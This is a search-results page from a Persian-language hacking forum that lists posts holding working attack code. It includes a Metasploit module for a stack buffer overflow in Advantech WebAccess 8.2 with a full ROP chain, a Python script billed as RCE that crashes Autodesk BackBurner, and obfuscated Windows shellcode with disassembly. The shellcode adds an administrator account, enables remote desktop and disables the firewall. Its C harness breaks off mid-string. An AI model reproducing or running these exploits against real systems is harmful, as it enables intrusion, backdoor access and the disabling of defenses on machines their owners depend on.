رفتن به مطلب

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'service'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • AnonySec
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پروژه های شرکت
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

5 نتیجه پیدا شد

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  2. import sys import datetime import socket import argparse import os import time remote_host = '' remote_port = '' def callExit(): print "\n\t\t[!] exiting at %s .....\n" % datetime.datetime.now() sys.exit(1) def mySocket(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error: print 'Failed to create socket' sys.exit() print "\n\t[+] Socket Created" s.connect((remote_host, remote_port)) print "\n\t[+] Socket Connected to %s on port %s" % (remote_host, remote_port) return s # 250 backburner 1.0 Ready. def receiveBanner(s): banner = s.recv(4096) print banner def receiveData(s): data = s.recv(4096) print data def setDataCommand(s): receiveData(s) # backburner> print "Set Data Command" time.sleep(1) command = "set data\r\n" try: s.sendall(command) except socket.error: print 'Send failed' sys.exit() print "BackBurner Manager should have crashed" receiveData(s) # 200 Help receiveData(s) # Available Commands:.....and all set of commands # backburner> def main(): if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': os.system('clear') parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner') parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host') parser.add_argument('--port', nargs='?', dest='port', default=3234, help='remote Port running manager.exe') args = parser.parse_args() if args.host == None: print "\t[!] IP of remote host?" sys.exit() global remote_host global remote_port remote_host = args.host remote_port = args.port print "remote_host: %s" % remote_host print "remote_port: %s" % remote_port s = mySocket() receiveBanner(s) setDataCommand(s) print 'exit' sys.exit() if __name__ == '__main__': try: sys.exit(main()) except KeyboardInterrupt: callExit()
  3. #Author: Ali Razmjoo #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x64 [1218 Bytes].c /* #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate WinExec => 0x769e2c91 ExitProcess => 0x769679f8 ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['[email protected]','[email protected]'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push %ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb dc 7a a8 23 mov $0x23a87adc,%ebx 6a: ba 4d 56 36 55 mov $0x5536564d,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov $0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx 10f: ba 4d 56 36 55 mov $0x5536564d,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr $0x8,%eax 124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx 1ce: ba 4d 56 36 55 mov $0x5536564d,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor %edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor %edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb dc 7a a8 23 mov $0x23a87adc,%ebx 377: ba 4d 56 36 55 mov $0x5536564d,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr $0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx 411: ba 4d 56 36 55 mov $0x5536564d,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor %edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx 4ab: ba 4d 56 36 55 mov $0x5536564d,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx 4b9: ba 63 36 46 46 mov $0x46463663,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\